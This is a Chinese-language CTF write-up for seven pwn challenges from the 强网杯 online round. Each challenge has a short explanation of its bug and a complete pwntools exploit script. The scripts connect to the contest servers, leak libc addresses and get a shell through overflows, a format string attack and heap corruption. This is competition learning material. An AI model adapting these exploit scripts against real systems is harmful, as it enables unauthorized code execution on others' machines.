强网杯_线上赛

我太菜了,不会windows pwn,不会python pwn,盯着SQLite3 一整天,蹲一波其他师傅的WP,题目附件

babymessage - 强网先锋

case 2中溢出修改 rbp的末尾字节 然后退出程序可以有概率调用 start函数,此时m为4,故第二次回到主函数的时候可以在case 2溢出到ret_address,修改ret_address为set rdi=0x100 然后进入leave_message的地址,注意第二次溢出的rbp值需要保存有一个可写的地址,进入后则是一个简单的ret2libc

1
from pwn import*
2
p = process('./main')
3
p = remote('123.56.170.202',21342)
4
elf =ELF('./main')
5
libc =ELF('./libc-2.27.so')
6
def menu(ch):
7
	p.sendlineafter('choice: ',str(ch))
8
menu(2)
9
p.sendafter('message:','FMYYFMYY' + '\x68')
10
menu(4)
11
menu(2)
12
p.sendafter('message:','FMYYFMYY' + p64(elf.bss() + 0x200) + p32(0x40098E))
13
pop_rdi_ret = 0x400AC3
14
p.sendafter('message:','FMYYFMYY' + p64(elf.bss() + 0x200) + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x40098E))
15
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['puts']
16
system = libc_base + libc.sym['system']
17
binsh = libc_base + libc.search('/bin/sh').next()
18
19
log.info('LIBC:\t' + hex(libc_base))
20
p.sendafter('message:','FMYYFMYY' + p64(elf.bss() + 0x200) + p64(pop_rdi_ret) + p64(binsh) + p64(system))
21
p.interactive()

Siri - 强网先锋

一个简单的格式化字符串,leak了stack地址之后就是对上面的地址进行一个返回地址和保存的rbp进行一个修改,通过抬栈 执行 one_gadget

1
from pwn import*
2
p = process('./main')
3
p = remote('123.56.170.202',12124)
4
libc = ELF('./libc-2.27.so')
5
p.sendlineafter('>>> ','Hey Siri!')
6
offset = 14
7
p.sendlineafter('>>> ','Remind me to  ' + 'BBBBAAAAAAAAStack:%46$pLIBC:%83$pPROC:%47$pCanary:%45$p')
8
p.recvuntil('Stack:')
9
stack = int(p.recv(14),16) - 288
10
log.info('Stack:\t' + hex(stack))
11
p.recvuntil('LIBC:')
12
libc_base = int(p.recv(14),16) - 231 - libc.sym['__libc_start_main']
13
log.info('LIBC:\t' + hex(libc_base))
14
p.recvuntil('PROC:')
15
proc_base = int(p.recv(14),16) - 0x144C
16
log.info('Proc:\t' + hex(proc_base))
17
p.recvuntil('Canary:')
18
canary = int(p.recv(18),16)
19
log.info('Canary:\t' + hex(canary))
20
pop_rdi_ret = proc_base  + 0x0152B
21
leave_ret = proc_base + 0x12E2
22
rce = libc_base + 0x10A45C
23
open_sys = libc_base + libc.sym['open']
24
read_sys = libc_base + libc.sym['read']
25
puts = libc_base + libc.sym['puts']
26
27
p.sendlineafter('>>> ','Hey Siri!')
28
off_1 = (((stack + 0x50)&0xFFFF))
29
off_2 = (leave_ret&0xFFFF)
30
#gdb.attach(p,'b *0x5555555552A2')
31
if off_1 > off_2:
32
	payload  = 'Remind me to ' + '%' + str((off_2 - 27)) + 'c%55$hn' + '%' + str((off_1 - off_2)) + 'c%56$hn'
33
	payload  = payload.ljust(0x38,'\x00')
34
	payload += p64(stack + 8) + p64(stack)
35
	payload += p64(rce)
36
else:
37
	payload  = 'Remind me to ' + '%' + str((off_1 - 27)) + 'c%55$hn' + '%' + str((off_2 - off_1)) + 'c%56$hn'
38
	payload  = payload.ljust(0x38,'\x00')
39
	payload += p64(stack) + p64(stack + 8)
40
	payload += p64(rce)
41
p.sendlineafter('>>> ',payload)
42
p.interactive()

Just a Galgame - 强网先锋

如果top_chunk的size 不够申请的大小,就会另外开辟一个top_chunk,将原先top_chunk扔进unsorted bin,切割后拿到libc_base,在case 5有个read(0,0x4040A0,8);往栈上写一个地址,然乎case 2没有对 index 索引进行一个 检测 越界修改这个地址里面的内容,即可将malloc_hook写为rce

1
from pwn import*
2
context.log_level ='DEBUG'
3
def menu(ch):
4
	p.sendlineafter('>> ',str(ch))
5
def new():
6
	menu(1)
7
def edit(index,name):
8
	menu(2)
9
	p.sendlineafter('idx >>',str(index))
10
	p.sendafter('movie name >> ',name)
11
def large():
12
	menu(3)
13
def show():
14
	menu(4)
15
def leave(say):
16
	menu(5)
17
	p.sendafter('QAQ\n',say)
18
p = process('./main')
19
p = remote('123.56.170.202',52114)
20
libc =ELF('./libc-2.27.so')
21
new()
22
edit(0,p64(0) + p64(0xD41))
23
large()
24
new()
25
show()
26
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook']  -0x10 - 1632
27
log.info('LIBC:\t' + hex(libc_base))
28
malloc_hook = libc_base + libc.sym['__malloc_hook']
29
rce = libc_base + 0x10A45C
30
leave(p64(malloc_hook - 0x60))
31
edit(8,p64(rce))
32
new()
33
p.interactive()

babynotes - 强网先锋

因为在regset中 strcpy 可以导致堆溢出修改下一个块的size,则可构造 chunk overlap,然后往malloc_hook中写入rce

1
from pwn import*
2
#context.log_level ='DEBUG'
3
def menu(ch):
4
	p.sendlineafter('>> ',str(ch))
5
def new(index,size):
6
	menu(1)
7
	p.sendlineafter('index:',str(index))
8
	p.sendlineafter('size:',str(size))
9
def show(index):
10
	menu(2)
11
	p.sendlineafter('index:',str(index))
12
def free(index):
13
	menu(3)
14
	p.sendlineafter('index:',str(index))
15
def edit(index,content):
16
	menu(4)
17
	p.sendlineafter('index:',str(index))
18
	p.sendafter('note:',content)
19
def Set(name,motto,age):
20
	p.sendafter('name:',name)
21
	p.sendafter('motto:',motto)
22
	p.sendlineafter('age:',str(age))
23
def check():
24
	menu(6)
25
p = process('./main')
26
libc =ELF('./libc-2.23.so')
27
p = remote('123.56.170.202',43121)
28
Set('FMYY','FAQ',0x21)
29
new(0,0x100)
30
new(1,0x18)
31
new(2,0x60)
32
new(3,0x60)
33
new(4,0x60)
34
free(0)
35
new(0,0x100)
36
show(0)
37
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x10 - 88 - libc.sym['__malloc_hook']
38
log.info('LIBC:\t' + hex(libc_base))
39
malloc_hook = libc_base + libc.sym['__malloc_hook']
40
rce= libc_base + 0xF1207
41
free(0)
42
free(1)
43
menu(5)
44
Set('U'*0x18,'FAQ',0xE1)
45
free(2)
46
new(0,0x60)
47
new(1,0x60) # 1 = 3
48
free(1)
49
free(0)
50
free(3)
51
new(3,0x60)
52
edit(3,p64(malloc_hook - 0x23))
53
new(0,0x60)
54
new(5,0x60)
55
new(1,0x60)
56
edit(1,'\x00'*0x13 + p64(rce))
57
free(0)
58
new(0,0x60)
59
p.interactive()

easypwn

首先一个off by null 可以构造一个堆块重叠,然后爆破半个字节并利用unsorted bin attack 攻击 global_max_fast,之后则是一个 free对应大小的块 越界后覆盖stdout的read_end 和 write_ptr指针,并令覆盖的内容相同 即可 leak libc_base,之后则是一个攻击 malloc_hook写入rce的ez操作

1
from pwn import*
2
#context.log_level ='DEBUG'
3
def menu(ch):
4
	p.sendlineafter('Your choice:',str(ch))
5
def new(size):
6
	menu(1)
7
	p.sendlineafter('size:',str(size))
8
def edit(index,content):
9
	menu(2)
10
	p.sendlineafter('idx:',str(index))
11
	p.sendafter('content:',	content)
12
def free(index):
13
	menu(3)
14
	p.sendlineafter('idx:',str(index))
15
def F(index):
16
	sleep(0.05)
17
	p.sendline('3')
18
	sleep(0.05)
19
	p.sendline(str(index))
20
def E(index,content):
21
	sleep(0.05)
22
	p.sendline('2')
23
	sleep(0.05)
24
	p.sendline(str(index))
25
	sleep(0.05)
26
	p.send(content)
27
	
28
while True:
29
	p  = process('./main')
30
	libc =ELF('./libc-2.23.so')
31
#	p = remote('39.101.184.181',10000)
32
	try:
33
		new(0x18)	#0
34
		new(0x2F8)  #1
35
		new(0x2F8)  #2
36
		new(0x380)  #3
37
		new(0x380)  #4
38
		new(0x380)  #5
39
		new(0x380)  #6
40
		new(0x380)  #7
41
		edit(7,(p64(0) + p64(0x21))*0x38)
42
		new(0x18)   #8
43
		free(0)
44
		edit(1,'\x00'*0x2F0 + p64(0x320))
45
		free(2)
46
		####################
47
		new(0x18)   #0
48
		new(0x78)   #2
49
		new(0x78)   #9
50
		new(0xF8)   #10
51
		new(0x88)   #11
52
		new(0x68)   #12
53
		new(0x2F8)  #13
54
55
		free(2)
56
		edit(9,'\x00'*0x70 + p64(0x100))
57
		free(10)
58
		new(0x78) #2
59
		new(0x78) #10 = 9
60
		new(0xF8) #14
61
62
63
		free(2)
64
		edit(1,p64(0) + '\xE8\x37\n')
65
		new(0x70)
66
		edit(1,'\x00'*0x78 + p64(0x1631) +  '\n')
67
		free(9)
68
69
		E(1,'\x00'*0x78 + p64(0x1651) + '\n')
70
		F(10)
71
		libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 131 - libc.sym['_IO_2_1_stdout_']
72
		log.info('LIBC:\t' + hex(libc_base))
73
		malloc_hook = libc_base + libc.sym['__malloc_hook']
74
		rce = libc_base + 0xF0364
75
		free(12)
76
		edit(1,'\x00'*0x288 + p64(0x71) + p64(malloc_hook - 0x23) + '\n')
77
		new(0x60) #9
78
		new(0x60) #10
79
		edit(10,'\x00'*0x13 + p64(rce) + '\n')
80
		new(0x10)
81
		break
82
	except:
83
		p.close()
84
		continue
85
p.interactive()

oldschool

审计一下给的源文件即可知道,在mmap_edit中因为 < 和 > 符号搞错了,导致越界,往一个地址写入一个64位长的整型变量,此时只需要leak libc,然后计算出此偏移,因为mmap_edit时的指针类型为int类型,所以 需要之前 offset>>2 才是正确的offset,之后就是往free_hook写入一个system,free(‘/bin/sh’)即可getshell

1
from pwn import*
2
context.log_level ='DEBUG'
3
def menu(ch):
4
	p.sendlineafter('Your choice:',str(ch))
5
def new(index,size):
6
	menu(1)
7
	p.sendlineafter('Index: ',str(index))
8
	p.sendlineafter('Size: ',str(size))
9
def edit(index,content):
10
	menu(2)
11
	p.sendlineafter('Index: ',str(index))
12
	p.sendafter('Content: ',content)
13
def show(index):
14
	menu(3)
15
	p.sendlineafter('Index: ',str(index))
16
def free(index):
17
	menu(4)
18
	p.sendlineafter('Index: ',str(index))
19
def m_new(index):
20
	menu(6)
21
	p.sendlineafter('start: ',str(index))
22
def m_edit(index,value):
23
	menu(7)
24
	p.sendlineafter('Index: ',str(index))
25
	p.sendlineafter('Value: ',str(value))
26
def m_free():
27
	menu(8)
28
p = process('./main')
29
libc =ELF('./libc-2.27.so')
30
p = remote('106.14.214.3',2333)
31
for i in range(8):
32
	new(i,0x100)
33
for i in range(8):
34
	free(7 - i)
35
for i in range(7):
36
	new(i + 1,0x100)
37
38
show(1)
39
p.recvuntil('Content: ')
40
heap_base = u32(p.recv(4)) - 0x380
41
log.info('HEAP:\t' + hex(heap_base))
42
43
new(0,0x78)
44
new(8,0x78)
45
edit(1,'/bin/sh\n')
46
show(0)
47
libc_base = u32(p.recvuntil('\xF7')[-4:]) - libc.sym['__malloc_hook'] - 0xD8
48
system = libc_base + libc.sym['system']
49
free_hook = libc_base + libc.sym['__free_hook']
50
log.info('LIBC:\t' + hex(libc_base))
51
rce = libc_base + 0x3D130
52
m_new(0)
53
address = ((free_hook - 0xE0000000)>>2)
54
m_edit(address,system)
55
free(1)
56
57
p.interactive()

direct

向上溢出,修改chunk的size,然后导致了堆块重叠,利用tcache dup把readdir保存有目录文件名称的附近的块申请下来,然后在向上溢出修改一下此块的size和next_chunk的prevsize和size域,再将此块放进unsorted bin中,则在closefile的选项中即可leak 出libc,之后则是简单的攻击 free_hook,往hook中写一个rce或者system的地址即可

1
from pwn import*
2
context.log_level = 'DEBUG'
3
def menu(ch):
4
	p.sendlineafter('Your choice: ',str(ch))
5
def new(index,size):
6
	menu(1)
7
	p.sendlineafter('Index:',str(index))
8
	p.sendlineafter('Size: ',str(size))
9
def edit(index,offset,size,content):
10
	menu(2)
11
	p.sendlineafter('Index: ',str(index))
12
	p.sendlineafter('Offset: ',str(offset))
13
	p.sendlineafter('Size: ',str(size))
14
	p.sendafter('Content: ',content)
15
def free(index):
16
	menu(3)
17
	p.sendlineafter('Index: ',str(index))
18
def openfile():
19
	menu(4)
20
def closefile():
21
	menu(5)
22
while True:
23
	p = process('./main')
24
	libc =ELF('./libc-2.27.so.bak')
25
	p = remote('106.14.214.3',1912)
26
	try:
27
		for i in range(8):
28
			new(i,0xF0)
29
		openfile()
30
		closefile()
31
		#gdb.attach(p,'b *0x555555554D7E')
32
		edit(0,-0x10,0x100,p64(0) + p64(0x501))
33
		free(0)
34
		new(0,0xF0)
35
		new(8,0xF0)
36
		new(9,0xF0)
37
		new(10,0xF0)
38
		new(11,0xF0)
39
		new(12,0xF0)
40
		free(5)
41
		free(6)
42
		edit(7,-0x100,0x100,'\xC0\xAA')
43
		new(6,0xF0)
44
		new(5,0xF0)
45
		free(7)
46
		free(6)
47
		free(4)
48
		free(3)
49
		free(2)
50
		free(1)
51
		free(0)
52
		edit(12,-0x7FE8,0x7FE8,p64(0x101) + 'FMYY' + '\x00'*(0xF0-4) + p64(0x100) + p64(0x21) + '\x00'*0x18 + p64(0x21))
53
		free(5)
54
		edit(12,-0x7FF0,0x7FF8,'F'*0x10)
55
		menu(5)
56
		libc_base = u64(p.recvuntil('\x7F',timeout=0.2)[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x10 - 0x60
57
		log.info('LIBC:\t' + hex(libc_base))
58
		free_hook = libc_base + libc.sym['__free_hook']
59
		system = libc_base + libc.sym['system']
60
		new(7,0xF0)
61
		free(8)
62
		new(0,0xF0)
63
		edit(0,0,0x10,p64(free_hook))
64
		new(8,0xF0)
65
		edit(8,0,0x10,'/bin/sh\x00')
66
		new(1,0xF0)
67
		edit(1,0,0x10,p64(system))
68
		free(8)
69
		break
70
	except:
71
		p.close()
72
		continue
73
p.interactive()
Contents
  1. 1. babymessage - 强网先锋
  2. 2. Siri - 强网先锋
  3. 3. Just a Galgame - 强网先锋
  4. 4. babynotes - 强网先锋
  5. 5. easypwn
  6. 6. oldschool
  7. 7. direct
|